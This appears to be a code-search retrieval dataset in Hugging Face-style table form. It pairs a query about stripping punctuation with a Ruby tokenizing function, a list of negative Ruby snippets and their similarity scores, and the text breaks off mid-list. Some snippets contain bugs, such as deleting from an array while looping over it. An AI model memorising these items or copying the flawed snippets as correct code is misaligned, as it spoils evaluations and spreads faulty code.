query
stringlengths 7
9.55k
| document
stringlengths 10
363k
| metadata
dict | negatives
sequencelengths 0
101
| negative_scores
sequencelengths 0
101
| document_score
stringlengths 3
10
| document_rank
stringclasses 102
values |
---|---|---|---|---|---|---|
remove_punc takes a string containing text and removes all the punctuation from it in order to finally return a list of words/tokens in the text | def remove_punc(text)
word_list = []
# Checking for correct encoding and reencoding the string if necessary
if ! text.valid_encoding?
text = text.encode("UTF-16be", :invalid=>:replace, :replace=>"?").encode('UTF-8')
end
# Removing puctuation
words = text.split(/[ ,;{}`~!@#$%^&*<>.:"'|?\\()_+=\/\[\]\-]/)
# Looping though the list, checking for valid words, and changing their case
for word in words
word = word[/\w*/]
word.downcase!
word_list.push(word)
end
# Deleting blanks
word_list.delete("")
return word_list
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def remove_punctuation\n gsub /[[:punct:]]/, ''\n end",
"def remove_punc_and_add_index(word)\n punc_collection = []\n word.chars.each_with_index do |char, index|\n if char.match?(/[',.\\-]/)\n punc_collection << [char, index]\n end\n end\n punc_collection\nend",
"def removeQuotesAndPunc sentence\n\t\tquotes = [\"\\\"\",\"'\",\":\",\",\",\".\",\"(\",\")\",\";\",\"!\",\"&\",\"<\",\">\",\"?\",\"-\",\"_\"]\n\t\twords = sentence.split(' ')\n\t\twords.map! do |w|\n\t\t\tw.slice!(1) if quotes.include?(w[0])\n\t\t\tw.slice(-1) if quotes.include?(w[-1])\n\t\t\tw\n\t\tend\n\t\treturn words.join(' ')\n\tend",
"def strip_punctuation(word)\n punctuation_stripping_regexp = /(.+)([^.,?!-_+=@#$%^&*()])/\n word.match(punctuation_stripping_regexp).to_s\nend",
"def remove_punctuation(phrase)\n phrase.gsub(/[^0-9a-z ,]/i, '')\n end",
"def strip_punctuation(token)\n original_set = token.split('')\n\n array = clean_leading_punctuations(original_set)\n array = clean_trailing_punctuations(array)\n stripped_token = array.join\n\n return token if stripped_token.size <= 2\n\n stripped_token\n end",
"def trim_punctuation\n lambda do |rec, accumulator|\n accumulator.collect! {|s| Marc21.trim_punctuation(s)}\n end\n end",
"def remove_punctuation(str)\n str.gsub(/[^0-9A-Za-z]/, '')\n end",
"def call\n text\n .split\n .map { |token| convert_sym_to_punct(token) }\n .flat_map { |token| \n token = should_downcase(token)\n remove_symbols(token)\n }\n .flat_map { |token| token.split(Regex::COMMAS_OR_PUNCTUATION) }\n .flat_map { |token| token.split(Regex::VARIOUS) }\n .flat_map { |token| token.split(Regex::ENDS_WITH_PUNCTUATION2) }\n .flat_map { |token| split_dotted_email_or_digit(token) }\n .flat_map { |token| split_abbreviations(token) }\n .flat_map { |token| split_period_after_last_word(token) }\n .flat_map { |token| remove_slash_start_and_end(token) }\n end",
"def removePunctuation(line)\n line.to_s.gsub(/(^|\\s+)[[:punct:]]+|[[:punct:]]{2,}|[[:punct:]]+(\\s+|$)/,' ').strip \n end",
"def remove_punctuation(str)\n alpha = 'abcdefghijklmnopqrstuvwxyz '\n output_str = ''\n \n str.each_char do |char|\n if alpha.include?(char)\n output_str += char\n end\n end\n\n output_str\nend",
"def remove_words(text, removes)\n\twords = text.split(\" \")\n\n\twords_to_remove = []\n\n\tremoves.split(\" \").each do |item|\n\t\twords_to_remove << item\n\tend\n\n\treturn_text = \"\"\n\n\twords.each do |word|\n\t\treturn_text += \"#{word} \" unless words_to_remove.include?(word)\n\tend\n\n\treturn return_text\nend",
"def clean_up_punctuation(str)\n str.gsub(%r{[^A-Za-z\\d\\_\\:\\/]}, '')\n end",
"def all_words\n result = []\n tagged_words.each do |word|\n result << word[0] unless is_punctuation([ word[0], word[1] ])\n end\n result\n end",
"def tokenize\n return [] if unencoded_text.blank?\n # kill off all punctuation except [stuff]'s or [stuff]'t\n # this includes hyphens (words are split)\n str = unencoded_text.\n downcase.\n gsub(/[^a-zA-Z0-9\\']+/, ' ').\n gsub(/(\\w)\\'([st])\\b/, '\\1!\\2').gsub(/\\'/, ' ').gsub(/!/, \"'\")\n # Busticate at whitespace\n words = str.strip.split(/\\s+/)\n words.reject!{|w| w.length < 3 }\n words.map!{|w| Wukong::encode_str(w) }\n end",
"def remove_punctuation(string)\n punctuation?(string) ? string.chop! : string\nend",
"def tokenize(s)\nterms = s.gsub(/(\\s|\\d|\\W)+/u,' ').rstrip.strip.downcase.split(' ')\nterms.reject!{|term| @@stop_words.include?(term) || term.length < 3}\nterms\nend",
"def punctuation\n @input = @input.gsub(/\\p{P}/u, '')\n end",
"def normalize_punctuation(str)\n s = str.dup\n s.gsub! /\\s+/, ' '\n\n s.gsub(/\\s*&,/)\n\n # Collapse w/s around all\n s.gsub! /\\s*([:,&.;])\\s*/, '\\1'\n # Collapse consecutive dupes\n s.gsub! /([.,;&:])+/ , '\\1'\n\n # Collapse leading and trailing punctuation\n s.gsub! /^\\s*[,:&;.]|[.;&:,]\\s*$/, ''\n\n # Add whitespaces\n s.gsub! /([,.;:])(\\S)/, '\\1 \\2'\n s.gsub! /(\\S)([&])(\\S)/, '\\1 \\2 \\3'\n\n s.strip!\n s\n end",
"def remove_trailing_punctuation_from_content_at(txt)\n # ImplementationTag #punctuation_characters\n txt.sub(/[;,…]+\\z/, '')\n end",
"def strip_to_stems\n str = self.sanitize_tags\n terms_a = str.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n terms = terms_a.reject do |term|\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n end\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n terms = terms - STOP_STEMS\n return terms.join(' ')\n end",
"def tokenize_string(str)\n str.downcase.split(/\\b+/).map do |word|\n word.gsub(/[^\\w ]/,\"\")\n end.reject{|word| word.size < 2 }\nend",
"def xfrm_remove_stop_words(str)\n stop_words = ['Variant','variant', 'Erhua', 'Counter', 'Has', 'I', 'me', 'a', 'an', 'am', 'are', 'as', 'at', 'be', 'by','how', 'in', 'is', 'it', 'of', 'on', 'or', 'that', 'than', 'the', 'this', 'to', 'was', 'what', 'when', 'where', 'who', 'will', 'with', 'the']\n results = []\n str.gsub!($regexes[:inlined_tags], \"\") ## remove tag blocks\n str.split(' ').each do |sstr|\n # remove non word characters from string\n results << sstr unless stop_words.index(sstr.gsub(/[^a-zA-Z|\\s]/, '').strip)\n end\n return results.flatten.compact.join(' ')\n end",
"def clean_up(string)\n arr = string.split\n final_arr = []\n new_arr = arr.map do |word|\n word.scan(/\\w/).join\n end\n new_arr.each do |word|\n if word != \"\"\n final_arr << word\n end\n end\n final_arr.join(' ')\nend",
"def get_words(str)\n stopwords = stopwords()\n \n str = str.downcase\n str = strip_parenthesis(str)\n str.strip!\n str.gsub!(\"'\", ' ')\n str.gsub!('\"', ' ')\n str.gsub!('.', ' ')\n str.gsub!(',', ' ')\n str.gsub!(':', ' ')\n str.gsub!('/', ' ')\n str.gsub!('!', ' ')\n str.gsub!('?', ' ')\n str.gsub!(';', ' ')\n str.gsub!('<', ' ')\n str.gsub!('>', ' ')\n str.gsub!('-', ' ')\n str.gsub!('$', ' ')\n str.gsub!(/( )+/, ' ')\n str_arr = str.split(' ')\n out_arr = []\n \n for word in str_arr\n if(word.length > 3 and out_arr.index(word) == nil and stopwords.index(word) == nil)\n out_arr << word\n end\n end\n \n out = out_arr.join(' ')\n \n return out\n end",
"def find_tokens(filename)\n html = File.read(filename)\n\n # Parsing the HTML content of the file\n parsed_html = parse_html(html)\n \n # Converting the text into a list of tokens after removing punctuation\n tokens = remove_punc(parsed_html)\n\n return tokens\nend",
"def sanitize_me(string)\n string = string.split(\" \")\n collection = []\n string.each do |word|\n collection << word.gsub(/[^A-Za-z]/,\"\").chars.sort.join\n end\n collection.join(\" \")\nend",
"def normalize( text )\n text.gsub(/\\s/,'').gsub(/[[:punct:]]/, '').gsub(/\\p{S}/,'').downcase\nend",
"def cleanup(str)\n str.gsub(/\\W+/,' ')\nend",
"def words(string)\n return [] if string.nil?\n allowed = [' ', 'a-z', 'A-Z', '0-9'] + String::LATIN_MAP.values\n disallowed = ['¿', '¡'] # Add some disallowed chars that cannot be catched. TODO: Improve!\n match = /[^#{allowed.join('')}]/\n string.\n gsub(/\\s+/mu, ' ').\n gsub(/[#{disallowed.join}]/u, '').\n gsub(/#{match}+ /u, ' ').\n gsub(/ #{match}+/u, ' ').\n gsub(/#{match}+$/u, '').\n gsub(/^#{match}+/u, '').\n split(/ /)\n end",
"def clean_string(string)\n string.gsub(/\\W+/, '')\nend",
"def strip_text(passage)\n passage.downcase.gsub(/[^a-z ]/, ' ').split#split makes and array\nend",
"def words\n @words ||= text.split(/\\s/).delete_if { |word| word.length.zero? }\n end",
"def cleanup(string)\n string.gsub!(/\\W+/, ' ')\nend",
"def cleanup(str)\n str.gsub(/\\W+/, ' ')\nend",
"def sanitize(text)\n sanitized_text = text.dup\n\n # Strip URLs\n sanitized_text.gsub!(URL_REGEX, '')\n\n # Strip @mention style tokens\n sanitized_text.gsub!(MENTION_REGEX, '')\n\n sanitized_text\n end",
"def strip_non_word_characters!\n @raw.gsub!(/[^\\w\\ \\-.,]/, ' ')\n end",
"def normalize(text)\n normalized = text.gsub(\" '\",\" \").gsub(\"' \",\" \")\n normalized.delete! \".\" \",\" \"(\" \")\" \";\" \"!\" \":\" \"?\" \"\\\"\"\n normalized.downcase.split\nend",
"def unique_words(text)\n split_normalise(text).uniq\nend",
"def cleanup(sentence)\n sentence.gsub(/[^a-z]+/i, ' ')\nend",
"def remove_w_words(sentence)\n \nend",
"def cleanup(string)\n string.gsub!(/\\W/, ' ').squeeze(' ')\nend",
"def product_punctuation(str)\nend",
"def pre_tokenize(text)\n normalized_text = text.gsub(/^every\\s\\b/, '')\n normalized_text = text.gsub(/^each\\s\\b/, '')\n normalized_text = text.gsub(/^on the\\s\\b/, '')\n normalized_text.downcase\n end",
"def cleanup(text)\n text.gsub(/[^a-z]/i,\" \").squeeze(\" \")\nend",
"def clean(string)\n string.gsub(/[',.!?:;]['s]/, \"\")\n\nend",
"def cleanup(text)\n text.gsub(/[^a-z]/i, '')\nend",
"def unique_words(text)\n normalize(text).uniq\nend",
"def unique_words(text)\n normalize(text).uniq\nend",
"def cleanup(str)\n str.gsub(/\\W/, ' ').squeeze(' ')\nend",
"def product_punctuation(str)\n\nend",
"def clean(s)\n @cleaned = String.new(s)\n tokenize(@cleaned)\n @cleaned.gsub!(/[.,\\d]*\\d/, '<NUM>')\n @cleaned.gsub!(/[^a-zA-Z0-9,.;:<>\\-'\\/$% ]/, '')\n @cleaned.gsub!('--', ' ')\n @cleaned = @cleaned.split\n end",
"def cleanup(txt)\n txt.gsub(/[^a-z]/i, ' ').squeeze(' ')\nend",
"def remove_chars(str)\n return str.gsub(/,/, \" \").gsub(/[^\\w\\d ]/,\"\").downcase.split\n end",
"def regex_strip(string)\n return string.gsub(/[^\\p{L}\\p{N}]/u, \" \")\n end",
"def tokenize(text)\n text.downcase.split(/[\\s\\.,\"']+/)\n end",
"def remove_non_words_and_downcase str\n # \\W means charcaters not in range [a-zA-z0-9_]\n # dash '-' is removed, but underscore '_' is kept\n # whitespace is not part of \\w so they are removed, too!\n str.downcase\n .gsub(/\\W/, '')\nend",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def remove_nonprinting_chars(text)\n return text if text.blank?\n\n text.chars.map { |char| rejected_char?(char) ? ' ' : char }.join\n end",
"def wordify(text) # :doc:\n text.split(/\\s+/)\n end",
"def clean_posts(post)\r\n\t\t# takes html-free post and parses it back togther with one space per word.\r\n\t\t# guards against improperly concatenating text together in sister method clean_string\r\n\t\twords = clean_string(post).split()\r\n\t\tpolished = ''\r\n\t\twords.each { |word| polished += word + ' ' }\r\n\t\treturn polished\r\n\tend",
"def clean_text(string)\n if string\n string.chomp!\n string.gsub!(/\\t+|\\(.+?\\)\\s*/,'')\n string.gsub!(/‘|’|„|“/, \"'\")\n string.squeeze!(\"?|!\")\n string.gsub!(/!\\?|\\?!/, \"?\")\n string.gsub!(/…|!|\\.\\.\\./, \".\") # Used the three marks to keep the count clean\n string.gsub!(/(Na)(ja)/i, '\\1 \\2')\n string.squeeze(\" \").strip\n else\n \"\"\n end\n end",
"def remove_w_words(sentence)\r\n\r\n arr = [] # empty array created\r\n x = sentence.split(\" \")\r\n\r\n i = 0\r\n while i < x.length # iteration starts to check \"w\" in each word\r\n arr << x[i] if x[i][0] != \"w\" # words w/o \"w\" collected\r\n i += 1\r\n end\r\n\r\n arr.join(\" \") # result\r\nend",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def words (text)\n return text.downcase.scan(/[a-z]+/) #find all matches of this simple regular expression\n end",
"def pig_it text\n arr = []\n text.split.map do |x|\n split_word = x.split('')\n unless /[[:punct:]]/.match(x)\n first_letter = split_word.first\n split_word.shift\n split_word << \"#{first_letter + 'ay'}\"\n end\n arr << split_word.join\n end\n arr.join(' ')\nend",
"def sanitize text\n [' ', '\\r\\n', \"\\r\\n\", \"\\n\", \"\\r\", \"\\t\", / ^/, / $+/, /^ /, /^ /].each { |text_to_remove|\n text.gsub!(text_to_remove,'')\n }\n return text\n end",
"def cleanup2(string)\n string.gsub(/[^a-z]/i, ' ').squeeze\nend",
"def get_punctuation(string)\n punctuation?(string) ? string.chars.last : ''\nend",
"def clean(s)\n @cleaned = String.new(s)\n tokenize(@cleaned)\n @cleaned.gsub!(/[.,\\d]*\\d/, '<NUM>')\n @cleaned.gsub!(/[^a-zA-Z0-9,.;:<>\\-'\\/$% ]/, '')\n @cleaned.gsub!('--', ' ')\n @cleaned = @cleaned.split\n end",
"def extract_all_words(html)\n doc = Nokogiri::HTML(html)\n keywords = []\n doc.css(\"meta[name='keywords']\").each do |node|\n keywords += node['content'].gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ',]/, '').squeeze(\" \").split(\",\")\n end\n text = String.new\n doc.css(\"meta[name='description']\").each do |node|\n text += node['content']\n end\n \n %w(script style link meta).each do |tag|\n doc.css(tag).each { |node| node.remove }\n end\n\n w = []\n doc.traverse do |node|\n if node.text? then\n w << node.content + \" \"\n end\n end\n text += w.join.gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ']/, '').squeeze(\" \")\n words = (text.downcase.split - STOPWORDS)\n \n final = (keywords + words)\n final.map do |w|\n w.stem\n end\n end",
"def remove_stop_tokens(tokens, stop_words)\n\n # Looping through the list of tokens and removing all the stop words from the list\n for i in tokens\n if stop_words.member?(i)\n tokens.delete(i)\n end\n end\n \n return tokens\nend",
"def scrub_text(text)\n TEXT_GSUBS.inject(text) { |memo, sub| memo = memo.gsub(*sub) }\n end",
"def remove_stop_words(song)\n\ttitle = song\n\ttitle.gsub!(/\\b(a|an|and|by|for|from|in|of|on|out|the|to|with)\\b+/, \"\")\n\treturn title\nend",
"def tokenize(sentence)\n return [] if sentence.nil? || sentence.length == 0\n sentence.split(' ').map { |word| word.downcase.to_sym } # interesting that we symbolize words with punctuation ?!\n end",
"def clean_text\n text.tr(\"'@_\", '').gsub(/\\W/, ' ').gsub(/[0-9]/, '').downcase\n end",
"def make_terms(text, lang)\n if !text\n return []\n end\n \n text = clean_text(text)\n\n # Turn non-breaking spaces into spaces. This is more complex than it should be, \n # due to Ruby version and platform character encoding differences\n # In particular Windows always seems to read as IBM437 encoding\n if RUBY_VERSION < \"1.9\"\n text.gsub!(/\\302\\240/,' ') \n else\n text.gsub!(\"\\u00A0\", \" \") # turn non-breaking spaces (UTF-8) into spaces \n end\n\n text = downcase_l(text,lang)\n\n # cleanups on Cable and Warlogs data\n text.gsub!(\"&\",\"\") # data has some HTML apostrophe mess, clean it up\n text.gsub!(\"amp;\",\"\")\n text.gsub!(\"apos;\",\"'\")\n text.gsub!(\"''\",\"'\") # double '' to single '\n text.gsub!(/<[^>]*>/, '') # strip things inside HTML tags\n\n # allow only a small set of characters\n text.tr!('\"()[]:,',' ') # turn certain punctation into spaces\n text = strippunct_l(text, lang) # remove anything not in the language charset (helps with OCR junk)\n text.gsub!(/\\s\\s*/, ' ') # collapse runs of spaces into single spaces\n\n terms = text.split(' ')\n terms.map!{ |t| t.sub(/^[^a-z0-9]+/,'').sub(/[^a-z0-9]+$/,'') } # remove leading/trailing punctuation\n \n # Now scan through the term list and spit out ungrams, bigrams\n termsout = []\n \n while t = terms.shift\n \n # look for a bigram starting with t\n if terms.length && terms[0] != nil\n t2 = terms[0]\n bigram = t + \"_\" + t2\n if @bigrams.include?(bigram)\n termsout << bigram\n #puts bigram\n next\n end\n end\n \n # DISABLED stemming, for easier installation (stemmer gem not req'd) js 21/2/2012\n # no bigram here, stem the individual term, output if it's \"acceptable\"\n #if @stem_terms \n # t = t.stem\n #end\n \n if term_acceptable(t)\n termsout << t\n end\n \n end\n \n return termsout\n end",
"def regexize_words(words)\n words.each {|word|word.gsub!(/(\\?|\\*)/, '\\w\\1')}\n end",
"def remove_paragraph_tags mytext\n mytext.sub!(/^<p>\\s*<\\/p>/,\"\")\n mytext.sub!(/(<br>)*<p>\\s*<\\/p>$/,\"\")\n mytext.sub!(/^<p>/,'')\n mytext.sub!(/<\\/p>?/,'')\n return mytext\n end",
"def clean_phrase\n clean_phrase = @phrase.dup\n clean_phrase.downcase!\n clean_phrase.squeeze!\n clean_phrase.gsub!(/[[:space:]]/, '')\n clean_phrase = clean_phrase.split(//)\n end",
"def words(text)\n text.downcase.scan(/[a-z]+/)\nend",
"def normalize(text)\n text.downcase.gsub(\"'\",\"\").gsub(/[^a-z ]/, ' ').split\nend",
"def normalize(text)\n text.downcase.split(\"\").map! {|i| i if ('a'..'z').include?(i) || i == \" \"}.join.split(\" \")\nend",
"def mltify_text text\n \n coder = HTMLEntities.new\n text = coder.decode text\n text = sanitize( text, okTags = \"\" )\n text = coder.encode text\n words = text.downcase.gsub( /[^A-za-z0-9\\s'\\-#]/, \" \" ).split( /\\s/ )\n \n final_words = []\n words.each do |w|\n unless stop_words.include? w\n final_words << w\n end\n end\n RAILS_DEFAULT_LOGGER.info final_words.join( ' ' ).squish\n final_words.join( ' ' ).squish\n end",
"def words( strict = false )\n splits = split( /\\b/ )\n splits.reject! { |w| !(w =~ /\\w/) } if strict\n splits\n end",
"def pig(word, howmany = 0)\r\n chars = word.split(//)\r\n lastletter_index = word.rindex(/\\w/)\r\n puncs = {}\r\n \r\n #grab punctuation, store info in hash\r\n chars.each_index { |x| puncs[x] = chars.at(x) if chars.at(x) =~ /\\W/ }\r\n\r\n #delete punctuation so we only deal with letters, does nothing if no punc \r\n chars.delete_if {|x| puncs.values.include?(x)} \r\n\r\n #not the most elegant for dealing with starts-with-vowel words, but more modular this way\r\n #skip this swapping stuff if it's a vowel for first letter\r\n if(howmany > 0) \r\n first = chars.slice!(0, howmany) #grab the first n chars, delete grabbed\r\n\r\n if(first[0] == first[0].upcase) #word was capitalized, swap order\r\n chars[0].upcase!\r\n first[0].downcase!\r\n end\r\n\r\n chars += first\r\n end\r\n\r\n #add back punctuation if it existed, does nothing if no punc\r\n puncs.keys.each { |key| chars.insert(key, puncs[key]) }\r\n \r\n #length == 1 means we got a single vowel like \"I\"; different rule\r\n chars.length == 1 ? chars << \"way\" : chars.insert(lastletter_index + 1, \"ay\") \r\n return chars.join(\"\")\r\nend",
"def test_remove_space_middle_of_id_space\nresult = remove_punctuation(\"sha wn\")\nassert_equal(\"shawn\", result)\nend",
"def process_text(text)\n regexp = /(?:\\s|^|>)(?<word>(\\w{0,3}|[-–—]|\\&ndash\\;|\\&mdash\\;|aboard|about|above|across|after|against|along|amid|among|anti|around|before|behind|below|beneath|beside|besides|between|beyond|concerning|considering|despite|down|during|except|excepting|excluding|following|from|inside|into|like|minus|near|onto|opposite|outside|over|past|plus|regarding|round|save|since|than|that|this|through|toward|towards|under|underneath|unlike|until|upon|versus|with|within|without)(?<space>\\s))/i\n text.gsub(regexp).each { |m| \"#{m[0..-2]} \" }\n end",
"def cleaned(txt)\n\t\ttxt.gsub(/[(,\\'.#)]/, '')\n\tend",
"def cleaned(txt)\n\t\ttxt.gsub(/[(,\\'.#)]/, '')\n\tend",
"def convert_to_words(text)\n convert_to_paragraph(text).join(\" \").split(\" \")\n end",
"def cleanup(str)\r\n str.chars.map {|char| char.match(/[A-Za-z0-9]/) ? char : ' ' }.join.squeeze(\" \")\r\nend",
"def cleanup(string)\n string.gsub(/[\\W\\d]/, ' ').gsub(/\\s+/, ' ')\nend",
"def normalized_words\n self.split(/\\s+/).map { |word|\n Iconv.iconv('ascii//translit//ignore', 'utf-8', word).first.downcase.gsub(/\\W/,'')\n }.\n delete_if(&:empty?).\n map { |word|\n \"**#{word}\"\n }\n end",
"def cleanup(string)\n string.gsub!(/[^a-zA-Z]/, ' ').squeeze(' ')\nend",
"def tokenize(english_text)\n english_text.split(/(<.*?>|<\\/.*?>|\\w+|\\W\\s)/x)\n end",
"def cleanup(str)\n # str.gsub!(/[^a-z]/, ' ').squeeze(' ')\n str.tr_s(' -/:-@[-`{-~', ' ')\nend",
"def clean(text)\n ctext = text.gsub(/[^\\p{Latin}0-9']/, ' ')\n ctext.gsub!(\"'\", \"' \")\n ctext\n end",
"def prep_text_for_match_query(text,exclude_dblquote=false,remove_weak_terms=true)\r\n result = text.dup\r\n result.downcase! # downcase for stop_words removal\r\n result.gsub!(\"'s\",'')\r\n remove_punctuation_proper!(result,exclude_dblquote)\r\n # result.gsub!(/([^\\s]+)/) { |word|\r\n # weak_term?(word) ? '' : word\r\n # } if remove_weak_terms\r\n # result\r\n # #!? check terms as adverbs?\r\n words = result.split(/\\W/)\r\n if remove_weak_terms\r\n words = words.select {|w| !weak_term?(w) }\r\n end\r\n words.compact!\r\n words.join(\" \")\r\n end"
] | [
"0.7275276",
"0.7010769",
"0.70014066",
"0.6991378",
"0.6945574",
"0.6888791",
"0.6863058",
"0.68302804",
"0.6824321",
"0.6711469",
"0.6635981",
"0.6596482",
"0.6585817",
"0.6529046",
"0.6502719",
"0.6480986",
"0.64564526",
"0.6440277",
"0.6398475",
"0.63197947",
"0.63158095",
"0.6250464",
"0.6218636",
"0.61995566",
"0.61629176",
"0.61604595",
"0.61193985",
"0.6071546",
"0.6071275",
"0.6061315",
"0.60362405",
"0.60313034",
"0.59956956",
"0.5980089",
"0.5979548",
"0.59732413",
"0.59661627",
"0.5872317",
"0.5869853",
"0.5864669",
"0.5857193",
"0.5837764",
"0.58330786",
"0.5828338",
"0.5802658",
"0.5782395",
"0.57819635",
"0.57787144",
"0.57787144",
"0.57705104",
"0.5759257",
"0.5721884",
"0.57079905",
"0.5707096",
"0.5695649",
"0.5682064",
"0.56606233",
"0.5656637",
"0.5643177",
"0.56356853",
"0.5634263",
"0.5624374",
"0.5617205",
"0.5612009",
"0.5612009",
"0.5612009",
"0.56016827",
"0.5599197",
"0.5585814",
"0.557979",
"0.55610013",
"0.55602115",
"0.5558068",
"0.54890835",
"0.54829633",
"0.5472611",
"0.5470636",
"0.5465723",
"0.54650587",
"0.5464823",
"0.54390526",
"0.5437744",
"0.5437608",
"0.54371554",
"0.5429608",
"0.5425554",
"0.5416699",
"0.5413396",
"0.541117",
"0.5408368",
"0.5408368",
"0.54080606",
"0.5398531",
"0.53962934",
"0.539415",
"0.5392804",
"0.5372329",
"0.53698516",
"0.5365861",
"0.53561264"
] | 0.7881077 | 0 |
function that takes the name of an html file stored on disk, and returns a list of tokens (words) in that file. | def find_tokens(filename)
html = File.read(filename)
# Parsing the HTML content of the file
parsed_html = parse_html(html)
# Converting the text into a list of tokens after removing punctuation
tokens = remove_punc(parsed_html)
return tokens
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def content_tokens\n filename\n end",
"def get_html path\n array = []\n\n archivo = File.open(path, 'r:UTF-8')\n archivo.each do |l|\n array.push(l.strip)\n\tend\n archivo.close\n\n return array\nend",
"def read_tokens()\n\n # By adding @ to tokens, we're saving it also in the instance. We're not\n # going to use that, but it might be useful later.\n @tokens = []\n\n File.open(@filename) do |input_file|\n input_file.each do |line|\n line.split.each do |word|\n word = normalize(word)\n @tokens << word unless word.empty?\n end\n end\n end\n\n @tokens\n end",
"def wordlist(filename)\n wordlist = []\n File.foreach(filename) { |x| wordlist << x.delete!(\"\\r\\n\") }\n wordlist\nend",
"def load_words(file_name)\n words_loaded = []\n File.open(file_name).readlines.each do |line|\n words_loaded << line if line.length.between?(5, 12)\n end\n words_loaded\n end",
"def load_words\n File.read(\"../scrabble word cheat/words.txt\").split(\"\\n\")\nend",
"def LoadFile ()\n\t\n\tinput = \"\"\n\tFile.foreach(\"../Data Files/042-Words.txt\") {|x| input = x }\n\tnames = input.split(\",\")\n\t\n\treturn names;\nend",
"def words_from_file( f )\n result = Array.new\n File.foreach( f ) do | line |\n result << self.words_from_string( line )\n end\n result.flatten\n end",
"def scanner\n @sentences ||= File.open(@path) do |file|\n file.each_line.each_with_object([]) do |line, acc|\n stripped_line = line.strip\n\n unless stripped_line.nil? || stripped_line.empty?\n acc << line.split(' ').map do |word|\n word.split('/').first\n end.join(' ')\n end\n end\n end\n\n end",
"def read_content(file)\n\t\tcontent = []\n\t\tfile.each do |f|\n\t\t\tif File.file?(f)\n\t\t\t\tFile.open(f, \"r\") do |f|\n\t\t\t\t\tword = \"\"\n\t\t\t\t\tf.each_line do |line|\n\t\t\t\t\t\tword += \"#{line}\"\n\t\t\t\t\tend\n\t\t\t\t\tcontent += [word]\n\t\t\t\tend\n\t\t\tend\t\t\t\n\t\tend\n\t\treturn calculate_content(content)\n\tend",
"def initialize(filename)\n @tag_list = nil\n @text_list = nil\n @html_string = []\n #Bring in the html file and return array\n @html_input_array = File.readlines(filename)\n #Iterate through, skip the first element(html declaration)\n @html_input_array[1..-1].each do |input|\n @html_string << input.strip\n end\n #Return array of strings w/o spaces\n @html_string = @html_string.join\n gen_combo_list\n end",
"def generate_token(path)\n tokens = {}\n\n Dir[path + \"*.token\"].each do |file|\n key = File.basename(file, \".token\") #remove path/extension from filename\n #read the first line, remove unwanted char and close it\n tokens[key] = File.open(file, &:readline).gsub(/\\r\\n|\\r|\\n/, '')\n end\n\n tokens\n end",
"def readwordfile name\r\n\t\t \tl_num=0\r\n\t\t File.open(name).each do |l|\r\n\t\t \t@wordtable[l_num] = l.gsub(\"\\r\",\"\").gsub(\"\\n\",\"\")\r\n\t\t l_num +=1\r\n\t\t end\r\n\t\t return l_num\r\n\t\t end",
"def load_old_index\n file = File.open('/home/matt/Documents/programming/ruby/dmsw/index.html', 'rb')\n html = file.read.chomp\n file.close\n return html\nend",
"def wordCollector(pageName)\n\twordHash = Hash.new 0\n\twords = Array.new\n\n\tcurrentPage = Nokogiri::HTML(open(pageName, :allow_redirections => :safe))\n\tpageText = currentPage.css('p').to_s\n\twords = pageText.split(/\\W+|\\d/)\n\twords.each do |string|\n\t wordHash[string] += 1\n\tend\n\treturn Website.new(pageName, wordHash, words.length)\nend",
"def visit_file(name)\n\t\ttrigram = []\n\t\tFile.open(name).each { |line|\n\t\t\ttrigram.push line.chomp\n\t\t\tif trigram.length > 3\n\t\t\t\ttrigram.shift\n\t\t\tend\n\t\t\tif trigram.length == 3\n\t\t\t\tt = Array.new(trigram)\n\t\t\t\t@trigram_counts[t] = 1 + @trigram_counts[t] \n\t\t\tend\n\t\t}\n\tend",
"def parse(filename)\n instructions = open filename\n instructions.read.split(//)\nend",
"def load_words\n File.readlines(\"#{WORD_DIR}/#{language}.txt\").map(&:strip)\n end",
"def extract_badgenames()\n@badgenames_array = []\n file = File.open('app/assets/post.html')\n doc = Nokogiri::HTML(file)\n doc.search('.mb_div > a').map do |element|\n @badgenames_array << element.inner_text\n end\n return @badgenames_array\nend",
"def html_parser(file)\n\n\tpage = Nokogiri::HTML(open(file))\n\n\ttags = page.css(\".started\")\n\ttags.each do |tag| \n\t\t$tweets << {:timestamp => tag.text.strip, :tag => file} \n\tend\n\tp \"Successfully parsed #{file}\"\n\treturn tags\n\nend",
"def readNames(path)\n return File.read(path).rstrip.split(/\\n/).map{|r| r.downcase.split(/\\|/)}\nend",
"def read_html_file(filename)\n \n file = File.open(filename)\n html_code = Nokogiri::HTML(file)\n file.close\n\n return html_code.to_s\nend",
"def support_rdoc_document_file!(file = '.document')\n return [] unless use_document_file\n File.read(file).gsub(/^[ \\t]*#.+/m, '').split(/\\s+/)\n rescue Errno::ENOENT\n []\n end",
"def read_html_file(filename)\n \n file = File.open(filename)\n html_code = Nokogiri::HTML(file)\n file.close\n \n return html_code.to_s\nend",
"def run\n\t\t\t\tif save_file\n\t\t\t\t\tdoc = Nokogiri::HTML(open(@file,\"r\"))\n\t\t\t\t\tparse_page(doc)\n\t\t\t\t\tflush_page\n\t\t\t save_words\n\t\t\t end\n\t\t\tend",
